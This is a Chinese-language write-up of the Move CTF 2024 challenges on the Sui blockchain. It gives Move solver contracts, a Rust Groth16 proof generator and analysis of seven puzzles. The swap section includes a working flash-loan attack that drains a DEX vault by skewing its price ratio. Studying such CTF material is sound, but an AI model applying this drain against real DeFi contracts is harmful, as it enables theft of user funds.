Move CTF 2024 Writeup

WriteUp 3个月前 admin
112 0 0
在最近举办的Move CTF比赛中,ZAN团队和蚂蚁天穹实验室组成参赛队伍参赛,在有效的119个参赛队伍中排名第8。

MoveCTF 2024是由Move生态最早期贡献者MoveBit联合ChainFlag 、MoveFuns、OpenBuild主办,Sui基金会独家赞助和特别支持的CTF赛事。本次CTF主要涉及到密码学、ZK、DEX、交易分析等类型的题目,参赛者需通过与Sui链进行交互来完成赛题。

本次CTF共有8个Challenge,我们的参赛团队共解决/完成了7个Challenge。

  • dynamic_matrix_traversal

  • swap

  • subset

  • zk1

  • easygame

  • kitchen

  • zk2

 

题目详细信息请查看链接:

https://github.com/movebit/movectf2024-day1

https://github.com/movebit/movectf2024-day2

 

dynamic_matrix_traversal

Move CTF 2024 Writeup

挑战合约的核心逻辑是玩家提供1对整数,构造1个m行n列的二维数组,且每个元素的值等于它上方元素和左边元素的和。对于第一行和第一列的元素,它们被初始化为 1。这种填充方式类似于计算帕斯卡三角形,该三角形在组合数学中用于计算二项式系数。完成这个二维向量的填充后,函数返回最右下角的元素值。因此,该问题可以转化为经典的计算二项式系数或帕斯卡三角形问题。

玩家需要重复上述过程两次,分别计算出2794155和14365对应的m和n值,分别为record.count_1, record.count_2 以及 record.count_3,record.count_4。且需要满足record.count_1 < record.count_3和record.count_2 > record.count_4这两个条件。利用帕斯卡三角形的性质,且数据量较小,我们可以很容易地搜索到两组值89,5和169,3。分别使用这两组数据调用execute,将record.count_1, record.count_2 以及 record.count_3,record.count_4设置为恰当的数值,再调用get_flag即可。

fun init(ctx: &mut sui::tx_context::TxContext) {    let record = Record {        id: object::new(ctx),        count_1: 0,        count_2: 0,        count_3: 0,        count_4: 0    };
    transfer::share_object(record);}
fun up(m: u64, n: u64): u64 {    let f: vector<vector<u64>> = vector::empty();    let i: u64 = 0;    while (i < m) {        let row: vector<u64> = vector::empty();        let j: u64 = 0;        while (j < n) {            if (j == 0 || i == 0) {                vector::push_back(&mut row, 1);            } else {                let f1 = *vector::borrow(&f, i - 1);                let j1 = *vector::borrow(&row, j - 1);                let val = *vector::borrow(&f1, j) + j1;                vector::push_back(&mut row, val);            };            j = j + 1;        };        vector::push_back(&mut f, row);        i = i + 1;    };    let fr = *vector::borrow(&f, m - 1);    let result = *vector::borrow(&fr, n-1);    result}
public entry fun execute(record: &mut Record, m: u64, n: u64) {    if (record.count_1 == 0) {        let result: u64 = up(m, n);        assert!(result == TARGET_VALUE_1, ERROR_RESULT_1);        record.count_1 = m;        record.count_2 = n;    } else if (record.count_3 == 0) {        let result: u64 = up(m, n);        assert!(result == TARGET_VALUE_2, ERROR_RESULT_2);        record.count_3 = m;        record.count_4 = n;    }}
public entry fun get_flag(record: &Record, ctx: &mut TxContext) {    assert!(record.count_1 < record.count_3, ERROR_PARAM_1);    assert!(record.count_2 > record.count_4, ERROR_PARAM_2);    event::emit(Flag { user: tx_context::sender(ctx), flag: true });}

swap

Move CTF 2024 Writeup

挑战合约是一个没有重入锁的去中心化交易所,初始合约金库拥有100个代币A,100个代币B,玩家拥有10个代币A、10个代币B。玩家的目标是将金库中的所有代币取出,然后触发调用get_flag()发出成功的事件。

在合约中有flash、repay_flash函数用于在一次调用内进行闪电贷,并且有swap函数用于代币交换。代币交换的逻辑是按输入代币a占金库库存比例输出代币b:

public fun swap_a_to_b<A,B>(vault: &mut Vault<A,B>, coina:Coin<A>, ctx: &mut TxContext): Coin<B> {    let amount_out_B = coin::value(&coina) * balance::value(&vault.coin_b) / balance::value(&vault.coin_a);    coin::put<A>(&mut vault.coin_a, coina);    coin::take(&mut vault.coin_b, amount_out_B, ctx)}

因此可以先flash 99枚A代币,然后便可以用1枚A代币swap出所有金库中的B代币了。在这之后只需要归还99枚A代币,并故技重施将剩下的所有A代币解出,就可以调用get_flag()函数:

public entry fun attack(vault: &mut Vault<CTFA,CTFB>,coin_a :&mut Coin<CTFA>,ctx: &mut TxContext) {    let sender = tx_context::sender(ctx);    let (loan_a,loan_b,res) = swap::vault::flash(vault,99,false,ctx);    let swap_coin = coin::split(coin_a,1,ctx);    let swap_b = swap::vault::swap_a_to_b(vault,swap_coin,ctx);    transfer::public_transfer(swap_b,sender);    swap::vault::repay_flash(vault,loan_a,loan_b,res);    (loan_a,loan_b,res) = swap::vault::flash(vault,101,false,ctx);    swap::vault::get_flag(vault,ctx);    swap::vault::repay_flash(vault,loan_a,loan_b,res);}

由于热土豆模式的原因,触发完还需要将闪电贷借用的代币归还。

 

Subset

Move CTF 2024 Writeup

本题要求是将传入的三个数组(数组元素必须是0或者1,其中为1的元素个数也是固定的)与题目中给定的三个数组分别按index相乘再相加,得到的和如果是指定的值,则可以将合约中status对象中的status1、status2、status3字段分别置为true,拿到flag。

进一步分析题目得知,本题考的是子集和问题,本质上是需要在给定的数组中,找出指定个数的元素,加起来的和为指定的值。

本题一共给出了三个数组,长度分别为5、40、80。我们认为数据量不算太大,所以直接采用暴力破解的方式算出了题解。但是如果数组长度再大一些,我们建议采用经典密码学算法-LLL knapsnack算法来解答本题。

在提交题解时,值得注意的一点是,题目中的Status结构体具有store、drop能力,意味着在使用该结构体声明的对象,在作用域结束时就会被丢弃。所以获取status对象时,需要用变量接收它。因此本题需要写合约来答题。解题代码为:

module solve_subset::ans {    use sui::tx_context;    use subset::subset_sum;
    public entry fun solveIt(ctx: &mut tx_context::TxContext) {        let status: subset_sum::Status = subset_sum::get_status(ctx);        let ans1: vector<u256> = vector<u256> [1, 0, 0, 1, 1];        let ans2: vector<u256> = vector<u256> [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0];        let ans3: vector<u256> = vector<u256> [0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0];        subset_sum::solve_subset1(ans1, &mut status);        subset_sum::solve_subset2(ans2, &mut status);        subset_sum::solve_subset3(ans3, &mut status);        subset_sum::get_flag(& status, ctx);    }}

zk1

Move CTF 2024 Writeup

本题关键是使用groth16 零知识证明算法去进行验证。首先需要读懂zk1.circom中的电路,该电路输入为a和b,输出为c。a和b都要求大于等于1。在此前提下,要求

Move CTF 2024 Writeup

考虑到数据大小,我们直接使用多线程优化的Pollard’s rho算法进行了暴力质因数分解,得出a和b的可取值为8333598376919903303和7027838896893106737374484418882753039002846643017920494481。并使用题目提供的Proving-Key生成了对应的零知识证明。

此题的一个难点在于生成的零知识证明如何以正确的形式提交到Sui合约中,Sui官方提供了一个文档描述了如何将ark_circom生成的zk-proof提交到sui合约中,但可能由于版本更新或其他原因,如果按照文档中(https://docs.sui.io/guides/developer/cryptography/groth16)提供的示例的方式提取public_input_bytes,Sui合约不会接受我们的证明,经过反复验证和排查,我们最终发现造成该问题的原因是ark_circom库将public_input_bytes额外包装了一层,导致生成的proof_inputs_bytes额外增加了一个头部,造成验证失败。在赛后和其他参赛选手的交流中,我们也了解到许多队伍同样正确计算出了proof,但许多人卡在了向Sui合约提交零知识证明的这一步。

生成零知识证明的Rust程序如下所示。

use ark_bn254::Bn254;use ark_circom::CircomBuilder;use ark_circom::CircomConfig;use ark_groth16::{Groth16, ProvingKey, VerifyingKey};use ark_snark::SNARK;use std::str::FromStr;use num_bigint::BigInt;use ark_serialize::{CanonicalDeserialize, CanonicalSerialize};use rand::rngs::OsRng;
fn main() {    // Load the WASM and R1CS for witness and proof generation    let pk_hex_str = "YOUR PROVING KEY HERE";
    let pk_bytes = hex::decode(pk_hex_str).expect("Invalid hex string");    let pk = ProvingKey::<Bn254>::deserialize_compressed(&*pk_bytes).unwrap();
    let mut rng = OsRng;

    let a = BigInt::from_str("8333598376919903303").unwrap();    let b = BigInt::from_str("7027838896893106737374484418882753039002846643017920494481").unwrap();
    let cfg = CircomConfig::<Bn254>::new("/Users/chris/CLionProjects/rust-example/zk2.wasm", "/Users/chris/CLionProjects/rust-example/zk2.r1cs").unwrap();    let mut builder = CircomBuilder::new(cfg);
    builder.push_input("a", a);    builder.push_input("b", b);
    let circom = builder.setup();

    let circom = builder.build().unwrap();
    let inputs = circom.get_public_inputs().unwrap();
    let proof = Groth16::<Bn254>::create_proof_with_reduction_no_zk(circom, &pk).unwrap();
    let vk_hex_str = "YOUR VERIFY KEY HERE";
    let vk_bytes = hex::decode(vk_hex_str).unwrap();
    let vk = VerifyingKey::<Bn254>::deserialize_compressed(&*vk_bytes).unwrap();
    let pvk = Groth16::<Bn254>::process_vk(&vk).unwrap();
    let verified = Groth16::<Bn254>::verify_with_processed_vk(&pvk, &inputs, &proof).unwrap();    assert!(verified);
    let mut proof_inputs_bytes = Vec::new();    let a = inputs.get(0).unwrap();    println!("{:?}", a);
    a.serialize_compressed(&mut proof_inputs_bytes).unwrap();    let mut proof_points_bytes = Vec::new();    proof.a.serialize_compressed(&mut proof_points_bytes).unwrap();    proof.b.serialize_compressed(&mut proof_points_bytes).unwrap();    proof.c.serialize_compressed(&mut proof_points_bytes).unwrap();
    println!("{:?}", proof_inputs_bytes);    println!("{:?}", proof_points_bytes);}

在使用Rust程序计算得到我们需要的proof_inputs_bytes和proof_points_bytes,我们直接使用sui client向合约提交我们的证明即可。

sui client call --function verify_proof --package PACKAGE-ID --module zk1 --args '[53, 113, 11, 212, 246, 19, 69, 100, 184, 3, 99, 76, 115, 20, 27, 102, 3, 144, 180, 71, 239, 104, 222, 9, 200, 32, 77, 55, 122, 61, 179, 32]' '[12, 91, 93, 139, 10, 42, 115, 162, 46, 162, 34, 20, 163, 170, 217, 78, 31, 191, 195, 216, 118, 61, 175, 108, 198, 29, 9, 161, 36, 23, 80, 38, 226, 31, 91, 215, 25, 63, 133, 240, 37, 206, 33, 198, 148, 161, 149, 56, 208, 233, 71, 150, 177, 78, 35, 53, 82, 2, 194, 50, 154, 187, 42, 19, 8, 107, 96, 32, 177, 41, 57, 26, 118, 177, 163, 36, 90, 118, 96, 100, 226, 178, 156, 144, 194, 180, 90, 182, 197, 66, 158, 150, 207, 114, 55, 172, 69, 215, 205, 117, 14, 63, 86, 84, 147, 25, 80, 225, 44, 4, 154, 31, 231, 156, 149, 18, 207, 36, 9, 106, 183, 165, 74, 202, 81, 149, 56, 6]' --gas-budget 10000000

easygame

Move CTF 2024 Writeup

 

合约给出了一个数列 v1=[1,2,4,5,1,3,6,7],要求玩家输入一个数列 v2 ,得出数列 v3 = v1.append(v2),要求计算新数列res最后1位为特定结果22,其中

Move CTF 2024 Writeup

口算得v2 =[9] 即可符合该条件,完成挑战。

let v = vector::empty<u64>();vector::push_back(&mut v, *vector::borrow(houses, 0));if (n>1){    vector::push_back(&mut v, math::max(*vector::borrow(houses, 0), *vector::borrow(houses, 1)));};let i = 2;while (i < n) {    let dp_i_1 = *vector::borrow(&v, i - 1);    let dp_i_2_plus_house = *vector::borrow(&v, i - 2) + *vector::borrow(houses, i);    vector::push_back(&mut v, math::max(dp_i_1, dp_i_2_plus_house));    i = i + 1;};*vector::borrow(&v, n - 1)

kitchen

Move CTF 2024 Writeup

本题主要考察move的vector及结构体存储的bytes形式,输入题目中对应对象 bcs::to_bytes转化后的结果,以及构造一个对象通过 bcs::to_bytes转化为特定的值即可完成挑战。

let v1 = vector::empty<Olive_oil>();let v2 = vector::empty<Yeast>();let v3 = vector::empty<Flour>();let v4 = vector::empty<Salt>();vector::push_back(&mut v1, kitchen::get_Olive_oil(0xa515));vector::push_back(&mut v1, kitchen::get_Olive_oil(0xa6b8));vector::push_back(&mut v1, kitchen::get_Olive_oil(0xc9f8));vector::push_back(&mut v1, kitchen::get_Olive_oil(0xbb46));vector::push_back(&mut v2, kitchen::get_Yeast(0xbd00));vector::push_back(&mut v2, kitchen::get_Yeast(0x999d));vector::push_back(&mut v2, kitchen::get_Yeast(0xb77e));vector::push_back(&mut v3, kitchen::get_Flour(0xd78a));vector::push_back(&mut v3, kitchen::get_Flour(0xfa84));vector::push_back(&mut v3, kitchen::get_Flour(0xb8f2));vector::push_back(&mut v4, kitchen::get_Salt(0xf1c5));vector::push_back(&mut v4, kitchen::get_Salt(0xe122));
let status = kitchen::kitchen::get_status(ctx);
kitchen::cook(v1,v2,v3,v4,&mut status);
let answer = vector<u8>[0x06,0xd9,0xb9,0x54,0xeb,0x68,0x92,0xf7,0xc5,0xec,0xa1,0x84,0xd0,0x04,0x00,0xbd,0x81,0xfc,0x9d,0x99,0x7e,0xb7,0x05,0xc7,0xdc,0x7a,0xcc,0x19,0x8f,0xb1,0x96,0x6d,0x8a,0x03,0x01,0x8b,0xc5,0xf1,0xec,0xc6];
kitchen::recook(answer,&mut status);
kitchen::get_flag(&status,ctx);

zk2

Move CTF 2024 Writeup

本题需要将protocol.vault中的value置为0,才能拿到flag。分析题目得知,通过调用withdraw函数,可以将vault中的value取走。这个前提是能通过零知识证明的校验,这就需要分析电路,生成public_inputs_bytes和proof_points_bytes。

 

分析zk2.circom中的电路,该电路输入为x和delta,输出为y。x要求大于等于1。在此前提下,要求

Move CTF 2024 Writeup

该方程是扭曲爱德华曲线方程,通过搜索扭曲爱德华曲线方程,获取到方程参数,包括基点和生成元,即找到了x和delta的值,这里找到两对解,这两对解在后续都需要用到。

x = 995203441582195749578291179787384436505546430278305826713579947235728471134delta = 5472060717959818805561601436314318772137091100104008585924551046643952123905
or
x = 5299619240641551281634865583518297030282874472190772894086521144482721001553delta = 16950150798460657717958625567821834550301663161624707787222815936182638968203

然后使用跟zk1一样的方法生成public_inputs_bytes和proof_points_bytes。

 

在调用withdraw函数完成题目时,还有两点值得注意:

  1. 在调用withdraw函数之前,需要先调用函数faucet,在protocol.balance中给sender添加balance,因为在函数withdraw中会去校验sender在protocol.balance中的值是否大于等于输入参数amount(想withdraw的值)。

  2. 需要两组x和delta的解,因为withdraw函数中,如果keccak256(&proof_points_bytes)已经被添加到protocol.proof_talbe中,则调用会直接报错。

public entry fun faucet(protocol: &mut Protocol, ctx: &mut tx_context::TxContext) {    table::add(&mut protocol.balance, tx_context::sender(ctx), 60_000);}
public entry fun withdraw(amount: u64, public_inputs_bytes: vector<u8>, proof_points_bytes: vector<u8>, protocol: &mut Protocol, ctx: &mut tx_context::TxContext) {    verify_proof(public_inputs_bytes, proof_points_bytes);    assert!(*table::borrow(&protocol.balance, tx_context::sender(ctx)) >= amount, 0);    table::add(&mut protocol.proof_talbe, keccak256(&proof_points_bytes), true);    let coin = coin::split(&mut protocol.vault, amount, ctx);    transfer::public_transfer(coin, tx_context::sender(ctx));}
END
 
关于我们 About Us

ZAN是蚂蚁数科旗下新科技品牌。依托AntChain Open Labs的TrustBase开源开放技术体系,拥有Web3领域独特的优势和创新能力,为Web3社区提供可靠、高性价比的区块链应用开发技术产品和服务。

 

凭借AntChain Open Labs的技术支持,ZAN为企业和开发者提供了全面的技术产品和服务,其中包括智能合约审计(ZAN Smart Contract Review)、身份验证eKYC(ZAN Identity)、交易风控技术(ZAN Know Your Transaction)以及节点服务(ZAN Node Service)等。

 

通过ZAN的一站式解决方案,用户可以享受到全方位的Web3技术支持。

ZAN Website:https://zan.top/home

 

Move CTF 2024 Writeup
联系我们
CONTACT US
Move CTF 2024 Writeup
Move CTF 2024 Writeup
Move CTF 2024 Writeup
Move CTF 2024 Writeup
Move CTF 2024 Writeup
“阅读原文” 获取更多联系方式 !

原文始发于微信公众号(ZAN Team):Move CTF 2024 Writeup

版权声明:admin 发表于 2024年1月17日 下午3:54。
转载请注明:Move CTF 2024 Writeup | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...